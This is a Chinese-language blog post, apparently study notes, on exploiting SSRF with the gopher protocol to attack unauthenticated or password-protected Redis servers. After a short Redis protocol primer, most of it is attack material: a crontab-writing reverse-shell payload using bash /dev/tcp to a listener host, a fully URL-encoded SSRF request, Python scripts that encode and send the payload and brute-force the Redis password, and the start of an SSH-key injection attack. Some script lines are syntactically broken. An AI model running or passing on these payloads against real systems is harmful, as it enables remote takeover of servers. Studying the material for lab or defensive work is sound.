<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Redis 简介Redis（Remote Dictionary Server）是一个开源的内存数据库，遵守 BSD 协议，它提供了一个高性能的键值（key-value）存储系统，常用于缓存、消息队列、会话存储等应用场景。 优点：性能高等 特点： Redis 的所有操作都是原子性的，这意味着操作要么完全执行，要么完全不执行。这种特性对于确保数据的一致性和完整性非常重要。 单线程等 Redis 命令本">
<meta property="og:type" content="article">
<meta property="og:title" content="SSRF漏洞攻击Redis">
<meta property="og:url" content="https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/index.html">
<meta property="og:site_name" content="青云阁">
<meta property="og:description" content="Redis 简介Redis（Remote Dictionary Server）是一个开源的内存数据库，遵守 BSD 协议，它提供了一个高性能的键值（key-value）存储系统，常用于缓存、消息队列、会话存储等应用场景。 优点：性能高等 特点： Redis 的所有操作都是原子性的，这意味着操作要么完全执行，要么完全不执行。这种特性对于确保数据的一致性和完整性非常重要。 单线程等 Redis 命令本">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://example.com/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/1746790234595.jpg">
<meta property="og:image" content="d:\HexoBlog\source\SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis\1746790443221.jpg">
<meta property="article:published_time" content="2025-05-09T11:28:54.000Z">
<meta property="article:modified_time" content="2025-05-09T11:39:53.031Z">
<meta property="article:author" content="YUNiversity">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="SSRF漏洞攻击Redis">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://example.com/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/1746790234595.jpg">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>SSRF漏洞攻击Redis</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="青云阁" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">文章</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/links/">友链</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2025/05/09/SSRF%E6%89%93Fastcgi/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&text=SSRF漏洞攻击Redis"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&title=SSRF漏洞攻击Redis"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&is_video=false&description=SSRF漏洞攻击Redis"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=SSRF漏洞攻击Redis&body=Check out this article: https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&title=SSRF漏洞攻击Redis"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&title=SSRF漏洞攻击Redis"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&title=SSRF漏洞攻击Redis"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&title=SSRF漏洞攻击Redis"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&name=SSRF漏洞攻击Redis&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://example.com/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/&t=SSRF漏洞攻击Redis"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Redis-%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">Redis 简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Redis-%E5%91%BD%E4%BB%A4"><span class="toc-number">2.</span> <span class="toc-text">Redis 命令</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E5%90%AF%E5%8A%A8"><span class="toc-number">2.0.0.0.0.1.</span> <span class="toc-text">本地启动</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%9C%A8%E8%BF%9C%E7%A8%8B%E6%9C%8D%E5%8A%A1%E4%B8%8A%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">2.0.0.0.0.2.</span> <span class="toc-text">在远程服务上执行命令</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%AD%E6%B3%95"><span class="toc-number">2.0.1.</span> <span class="toc-text">语法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B"><span class="toc-number">2.0.2.</span> <span class="toc-text">实例</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%A5%E4%BE%B5"><span class="toc-number">3.</span> <span class="toc-text">入侵</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#Redis%E5%85%A5%E4%BE%B5%EF%BC%8C%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">3.0.0.0.0.1.</span> <span class="toc-text">Redis入侵，反弹shell</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#Redis%E8%AE%A4%E8%AF%81%E6%94%BB%E5%87%BB"><span class="toc-number">3.0.0.0.0.2.</span> <span class="toc-text">Redis认证攻击</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#0x03-%E5%86%99ssh-keygen%E5%85%AC%E9%92%A5%EF%BC%8C%E4%BD%BF%E7%94%A8%E7%A7%81%E9%92%A5%E7%99%BB%E9%99%86"><span class="toc-number">3.0.0.0.0.3.</span> <span class="toc-text">0x03 写ssh-keygen公钥，使用私钥登陆</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#0x04-%E5%86%99webshell"><span class="toc-number">3.0.0.0.0.4.</span> <span class="toc-text">0x04 写webshell</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        SSRF漏洞攻击Redis
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">YUNiversity</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-05-09T11:28:54.000Z" class="dt-published" itemprop="datePublished">2025-05-09</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/SSRF/">SSRF</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/" rel="tag">SSRF漏洞攻击Redis</a>, <a class="p-category" href="/tags/Web/" rel="tag">Web</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="Redis-简介"><a href="#Redis-简介" class="headerlink" title="Redis 简介"></a><strong>Redis 简介</strong></h1><p>Redis（Remote Dictionary Server）是一个开源的内存数据库，遵守 BSD 协议，它提供了一个高性能的键值（key-value）存储系统，常用于缓存、消息队列、会话存储等应用场景。</p>
<p>优点：性能高等</p>
<p>特点：</p>
<p>Redis 的所有操作都是原子性的，这意味着操作要么完全执行，要么完全不执行。这种特性对于确保数据的一致性和完整性非常重要。</p>
<p>单线程等</p>
<h1 id="Redis-命令"><a href="#Redis-命令" class="headerlink" title="Redis 命令"></a><strong>Redis 命令</strong></h1><h6 id="本地启动"><a href="#本地启动" class="headerlink" title="本地启动"></a><strong>本地启动</strong></h6><p>进入src目录</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">cd redis-2.8.17/src
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>启动redis </p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">./redis-server 
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>Redis 命令用于在 redis 服务上执行操作。</p>
<p>要在 redis 服务上执行命令需要一个 redis 客户端。Redis 客户端在我们之前下载的的 redis 的安装包中。</p>
<p>Redis 客户端启动</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">redis-cli
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>启动 redis 服务器，打开终端并输入命令 <strong>redis-cli</strong>，该命令会连接本地的 redis 服务。</p>
<p>  <img src="/img/loading.gif" data-original="/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/1746790234595.jpg" alt="1746790234595"></p>
<p>在以上实例中我们连接到本地的 redis 服务并执行 <strong>PING</strong> 命令，该命令用于检测 redis 服务是否启动。</p>
<h6 id="在远程服务上执行命令"><a href="#在远程服务上执行命令" class="headerlink" title="在远程服务上执行命令"></a><strong>在远程服务上执行命令</strong></h6><p>如果需要在远程 redis 服务上执行命令，同样我们使用的也是 <strong>redis-cli</strong> 命令。</p>
<h3 id="语法"><a href="#语法" class="headerlink" title="语法"></a><strong>语法</strong></h3><pre class="line-numbers language-language-shell"><code class="language-language-shell">$ redis-cli -h host -p port -a password
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a><strong>实例</strong></h3><p>以下实例演示了如何连接到主机为 127.0.0.1，端口为 6379 ，密码为 mypass 的 redis 服务上。</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">$redis-cli -h 127.0.0.1 -p 6379 -a "mypass"
redis 127.0.0.1:6379>
redis 127.0.0.1:6379> PING
PONG
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<h1 id="入侵"><a href="#入侵" class="headerlink" title="入侵"></a><strong>入侵</strong></h1><p>在开始讲攻击Redis之前，必须要理解Redis的客户端和服务端的通信方式，以及数据发送的格式，该目的的实现需要tcpdump的抓包功能。使用抓包软件来查看Redis客户端和Redis服务端的通信数据，找到语法结构后开始模拟客户端发送数据。</p>
<p>1.使用tcpdump来完成抓包，命令如下：</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">tcpdump -i eth0 port 6379 -w redis.pcap
参数说明如下：（更多tcpdump的教程，参考[Tcpdump教程](https://www.runoob.com/linux/linux-comm-tcpdump.html)）
-i：指定网卡为eth0
port：指定抓哪个端口的数据
-w：将流量包保存为文件
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>2、使用Redis客户端登录Redis服务端，命令如下(默认无密码)：</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">root@Kali-2018:~/tmp# redis-cli -h 192.168.228.130 -p 6379
192.168.0.119:6379> get a
(nil)
192.168.0.119:6379>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>以上命令做了一个获取a对应的值是多少的操作，现在我们使用wireshark看一下抓到的包(使用追踪流-TCP流)：</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">*2
$3
get
$1
a
-1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>（这里没搞懂，但是wireshark使用方法参考工具的笔记）</p>
<p>不理解Redis的数据发送的数据包格式，是看不懂上面内容的，这里必须要讲这么几个内容：</p>
<p><strong>2.1、序列化协议</strong></p>
<p>客户端-服务端之间交互的是序列化后的协议数据。在Redis中，协议数据分为不同的类型，每种类型的数据<strong>均以CRLF（\r\n）结束</strong>，通过<strong>数据的首字符区分类型</strong>。</p>
<p><strong>2.2、inline command</strong></p>
<p>这类数据表示<strong>Redis命令，首字符为Redis命令的字符</strong>，格式为 str1 str2 str3 …。如：exists key1，命令和参数以空格分隔。</p>
<p><strong>2.3、simple string</strong>：<strong>首字符为’+’</strong>，后续字符为<strong>string</strong>的内容，且该string <strong>不能包含’\r’或者’\n’两个字符，最后以’\r\n’结束</strong>。如：’+OK\r\n’，表示”OK”，这个string数据。</p>
<p><strong>2.4、bulk string</strong>：bulk string <strong>首字符为’$’</strong>，紧跟着的是string数据的长度，<strong>‘\r\n’后面是内容本身</strong>（包含’\r’、’\n’等特殊字符），最后以’\r\n’结束。如：</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">"$12\r\nhello\r\nworld\r\n"
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>上面字节串描述了 “hello\r\nworld” 的内容（中间有个换行）。对于” “空串和null，通过’$’ 之后的数字进行区分：</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">"$0\r\n\r\n" 表示空串；
"$-1\r\n" 表示null。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><strong>2.5、integer</strong>：以 <strong>‘:’ 开头</strong>，后面跟着整型内容，最后以’\r\n’结尾。如：”:13\r\n”，表示13的整数。</p>
<p><strong>2.6、array</strong>：以**’*‘开头**，<strong>紧跟着数组的长度</strong>，”\r\n” 之后是<strong>每个元素的序列化数据</strong>。如：”*2\r\n+abc\r\n:9\r\n” 表示一个长度为2的数组：[“abc”, 9]。数组长度为0或 -1分别表示空数组或 null。</p>
<p>数组的元素本身也可以是数组，多级数组是树状结构，采用先序遍历</p>
<p>的方式序列化。如：[[1, 2], [“abc”]]，序列化为：”<em>2\r\n</em>2\r\n:1\r\n:2\r\n*1\r\n+abc\r\n”。</p>
<p>3、经过上面内容的讲解，在回过头理解抓到的redis的包就很容易明白了。</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">*2 数组长度为2
$3 bulk string，代表字符串长度为3，就是get
get 普通字符
$1 bulk string，代表字符串长度为1，就是a
a 普通字符
-1 返回内容，-1代表null
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="Redis入侵，反弹shell"><a href="#Redis入侵，反弹shell" class="headerlink" title="Redis入侵，反弹shell"></a><strong>Redis入侵，反弹shell</strong></h6><p>如果要给redis发命令，按照他的序列化规则即可。现在有一个大胆的想法，如果我用gopher去执行redis的命令呢？为了实现我们的想法，我们在Redis中加一个key，名字为name，值为Margin。命令如下：</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">set name Margin
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>此时，我们使用curl来发起gopher的请求，如下：</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">curl gopher://192.168.0.119:6379/_*2 $3 get $4 name
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>将其转化为url编码</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">curl gopher://192.168.0.119:6379/_%2a%32%0d%0a%24%33%0d%0a%67%65%74%0d%0a%24%34%0d%0a%6e%61%6d%65%0d%0a
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>执行结果如下</p>
<p><img src="/img/loading.gif" data-original="D:\HexoBlog\source\SSRF漏洞攻击Redis\1746790443221.jpg" alt="1746790443221"></p>
<p>可以看到确实可以得到我们想要的东西</p>
<p>和Gopher协议在SSRF漏洞中的深入研究里面的方法差不多了</p>
<p>命令如下</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell"># 添加名为mars的key，值为后面反弹shell的语句,5个星号代表每分钟执行一次，开始和技术的\n必须要有一个，也就是前后各有一个，当然，多个可以，
主要是为了避免crontab的语法错误。crontab知识可以参考：【https://www.runoob.com/w3cnote/linux-crontab-tasks.html】
set mars "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1\n\n\n\n"
# 设置备份的路径为/etc
config set dir /etc/
# 设置备份文件名为crontab
config set dbfilename crontab
# 开始备份
save
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>上述命令的含义总结为，利用Redis的备份功能，将</p>
<p><a target="_blank" rel="noopener" href="https://zhida.zhihu.com/search?content_id=113329614&amp;content_type=Article&amp;match_order=2&amp;q=crontab&amp;zd_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ6aGlkYV9zZXJ2ZXIiLCJleHAiOjE3NDM2NTk2MDIsInEiOiJjcm9udGFiIiwiemhpZGFfc291cmNlIjoiZW50aXR5IiwiY29udGVudF9pZCI6MTEzMzI5NjE0LCJjb250ZW50X3R5cGUiOiJBcnRpY2xlIiwibWF0Y2hfb3JkZXIiOjIsInpkX3Rva2VuIjpudWxsfQ.0EeIIidYMZq3N33PpqvWggNP1lfNZQp8fTCKHk0ht54&amp;zhida_source=entity">crontab</a>的定时任务备份到/etc/crontab中，起到执行命令的效果，因为Linux会监测/etc/crontab的内容，当我们将反弹shell的命令加入进去后，变会被执行</p>
<p>url编码</p>
<pre class="line-numbers language-language-http"><code class="language-language-http">http://192.168.0.109/ssrf/base/curl_exec.php?url=gopher%3a%2f%2f192.168.0.119%3a6379%2f_%25%30%64%25%30%61%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%32%30%25%36%64%25%36%31%25%37%32%25%37%33%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%30%25%32%65%25%33%31%25%33%31%25%33%39%25%32%66%25%33%39%25%33%39%25%33%39%25%33%39%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%36%33%25%37%32%25%36%66%25%36%65%25%37%34%25%36%31%25%36%32%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>简易脚本如下</p>
<pre class="line-numbers language-language-python"><code class="language-language-python">#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib2,urllib

url = "http://192.168.0.109/ssrf/base/curl_exec.php?url="
gopher = "gopher://192.168.0.119:6379/_"
# 攻击脚本，\n的\一定要转义
"set mars "\\n* * * * * root bash -i >& /dev/tcp/192.168.0.119/6670  0>&1\\n"
config set dir /etc/
config set dbfilename crontab
save
"""

def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder

# 二次编码
encoder = encoder_url(encoder_url(data))

# 生存payload
payload = url + urllib.quote(gopher,'utf-8') + encoder

# 发起请求
request = urllib2.Request(payload)
response = urllib2.urlopen(request).read()
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>至于为什么不进行rce，这是由于无回显，如果想要回显的话需要在命令后面加QUIT，后面会用到</p>
<h6 id="Redis认证攻击"><a href="#Redis认证攻击" class="headerlink" title="Redis认证攻击"></a><strong>Redis认证攻击</strong></h6><p>但是以上为redis无密码的攻击，但如果Redis设置了密码呢？</p>
<p>说起密码很自然就想起暴力破解或者更改密码，redis的认证命令抓包可以发现是</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">*2
$4
auth
$6
Margin
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>可以翻译为认证命令为auth xxxx</p>
<p>我们自然能更改密码为YUN</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">config set requirepass YUN
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>将请求包改为</p>
<pre class="line-numbers language-language-auth"><code class="language-language-auth">auth Margin 
quit
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>python代码变为</p>
<pre class="line-numbers language-language-python"><code class="language-language-python">#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib2,urllib

url = "http://192.168.0.109/ssrf/base/curl_exec.php?url="
gopher = "gopher://192.168.0.119:6379/_"

def get_password():
    f = open("password.txt","r")
    return f.readlines()

def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder



for password in get_password():
    # 攻击脚本
    "auth %s
    quit
    """ % password
    # 二次编码
    encoder = encoder_url(encoder_url(data))
    # 生存payload
    payload = url + urllib.quote(gopher,'utf-8') + encoder

    # 发起请求
    request = urllib2.Request(payload)
    response = urllib2.urlopen(request).read()
    if response.count("+OK") > 1:
        print "find password : " + password
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>所以，在已知密码的情况下可以将攻击的python代码中加入认证的语句，如下：</p>
<pre><code>auth Margin
set mars "\\n* * * * * root bash -i &gt;&amp; /dev/tcp/192.168.0.119/6671  0&gt;&amp;1\\n"
config set dir /etc/
config set dbfilename crontab
save
</code></pre>
<p>再次运行python脚本，便可成功反弹shell。</p>
<h6 id="0x03-写ssh-keygen公钥，使用私钥登陆"><a href="#0x03-写ssh-keygen公钥，使用私钥登陆" class="headerlink" title="0x03 写ssh-keygen公钥，使用私钥登陆"></a><strong>0x03 写ssh-keygen公钥，使用私钥登陆</strong></h6><p>在上面的内容中描述了如何使用Redis的数据备份执行命令，接下来讲解通过写入ssh-keygen公钥，使用私钥登录。思路还是利用备份，将私钥字符串备份到目标服务器.ssh目录下。</p>
<p>要完成此操作，需要两个前提条件</p>
<p>Redis服务使用ROOT账号启动(可以临时执行sudo -u root /usr/bin/redis-server /etc/redis/redis.conf来以root权限运行</p>
<p>服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器。</p>
<p>首先在本地生成一对密钥</p>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">ssh-keygen -t rsa
margine:.ssh margin$ ssh-keygen -t rsa
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<pre class="line-numbers language-language-shell"><code class="language-language-shell">
Generating public/private rsa key pair.
Enter file in which to save the key (/Users/margin/.ssh/id_rsa):  
/Users/margin/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /Users/margin/.ssh/id_rsa.
Your public key has been saved in /Users/margin/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:QKUmi/y9Tu27soIg2+rRrvDO16sQBnrSCzkVx4RcTSw margin@margine.local
The key's randomart image is:
+---[RSA 2048]----+
| ..=++o..        |
|  ooE.o.         |
|. . ..+          |
|.* . + .         |
|* B .   S        |
|o*.+ . .         |
|o=oo..o .        |
|oo=.o.oo         |
|o==o.+=++o       |
+----[SHA256]-----+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>查看密钥的字符串，一会使用Redis的备份功能，将密钥字符串传到目标服务器。</p>
